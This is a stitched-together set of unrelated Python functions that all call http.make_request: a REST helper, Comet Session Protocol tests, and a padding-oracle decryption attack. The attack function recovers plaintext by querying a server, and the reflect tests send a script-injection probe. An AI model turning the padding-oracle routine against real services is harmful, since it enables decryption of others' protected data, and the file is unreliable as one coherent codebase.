def do_req(self, rtype, url, data=None, headers=None): config = self.config url, schema, dheaders = self._url_schema_headers(url) headers = dheaders if not headers else headers if isinstance(data, dict): if schema: data.setdefault('$schema', schema) if rtype=='post' or rtype=='put': loc = "parameters" if url.count('/metadata') else "properties" self._add_gemini_auth(data, loc) if config.get("use_ssl", None): try: r = http.make_request(rtype, url, headers, json.dumps(data), config.get('ssl_cert', None), config.get('ssl_key', None), config['ssl_cafile']) except: logger.info("do_req", msg="Could not reach %s" % url) return None else: try: r = http.make_request(rtype, url, headers, json.dumps(data)) except: logger.info("do_req", msg="Could not reach %s" % url) return None try: return json.loads(r) except ValueError: return r except TypeError: return r
def test_duration_timeout(self): session, handshake_response = protocol.handshake() response = http.make_request(config.base_url + "/comet?du=1&s=" + session.key, timeout=1.2) packets = json.loads(response.body[1:-1]) if packets != []: raise CSPException("Invalid comet response: expected empty batch", response) print response.formatted_transcript()
def padding_oracle_decrypt(cypher_text, url, key, block_size = 16): cypher_text = common.hex_to_ascii(cypher_text) length = len(cypher_text) count = length // block_size D = [0] * length def clear(block): return D[:block * block_size] + [0] * (length - (block * block_size)) def padding(index, pad): return [0] * index + [pad] * pad + [0] * block_size for block in xrange(count - 1, 0, -1): for byte in xrange(block_size - 1, -1, -1): index = ((block - 1) * block_size) + byte for current in xrange(256): D[index] = current cleared = clear(block) padded = padding(index, block_size - byte) result = common.three_xor(cypher_text, cleared, padded) if http.make_request(url, key, common.ascii_to_string(result)): break if current == 255: D[index] = block_size - byte return common.ascii_to_string(D)
def handshake(): response = http.make_request(config.base_url + '/handshake?d={}') try: session_data = json.loads(response.body[1:-1]) session = Session(session_data['session']) return session, response except: raise error.CSPException("Invalid handshake response", response)
def test_handshake_get_valid_rsrp(self): response = http.make_request(self.base_url + "/handshake?d={}&rp=testing&rs=;") if response.code != 200: raise CSPException("Valid Handshake should return status code 200", response) if not response.body.startswith("testing"): raise CSPException("Handshake returns invalid REQUEST_PREFIX", response) if not response.body.endswith(";"): raise CSPException("Handshake returns invalid REQUEST_SUFFIX", response) reply = response.body[len("testing") : -len(";")] self._verify_handshake_response(reply, response)
def send(self, data): packet = json.dumps([[self.sentEventId,0, data]]) self.sentEventId += 1 response = http.make_request(config.base_url + '/send?s=' + self.key + '&d=' + packet) try: # XXX: check spec and fully parse response assert 'OK' in response.body except: raise error.CSPException("Invalid send response", response) return response
def comet(self): response = http.make_request(config.base_url + '/comet?s=' + self.key) output = "" try: packets = json.loads(response.body[1:-1]) for packet in packets: # XXX: use the proper decode function (urldecode, maybe) output += packet[2] except: raise error.CSPException("Invalid comet response", response) return output, response
def test_reflect_get(self): session, handshake_response = protocol.handshake() payload = "<script>alert('woot')</script>" url = self.base_url + "/reflect?s=" + session.key + "&d=" + payload response = http.make_request(url, reset_transcript=False, socket=handshake_response.socket) # response.prepend_transcript(handshake_response.socket.transcript) if response.code != 200: raise CSPException("Reflect (GET) should return status code 200", response) if payload != response.body: raise CSPException("Reflect (GET) returned invalid response body.", response) print response.formatted_transcript()
def test_reflect_post(self): session, handshake_response = protocol.handshake() payload = "<script>alert('woot')</script>" url = self.base_url + "/reflect?s=" + session.key body = payload response = http.make_request(url, method='POST', body=body, reset_transcript=False, socket=handshake_response.socket) if response.code != 200: raise CSPException("Reflect (POST) should return status code 200", response) if payload != response.body: raise CSPException("Reflect (POST) returned invalid response body.", response)
def test_handshake_get_valid_w_data(self): response = http.make_request(self.base_url + '/handshake?d={"spam":"eggs"}') if response.code != 200: raise CSPException("Valid Handshake should return status code 200", response) self._verify_handshake_response(response.body, response)
def _expect_failure_for_url(self, url, exception_message=None): response = http.make_request(self.base_url + url) if response.code == 200: self._raise_exception(exception_message, response)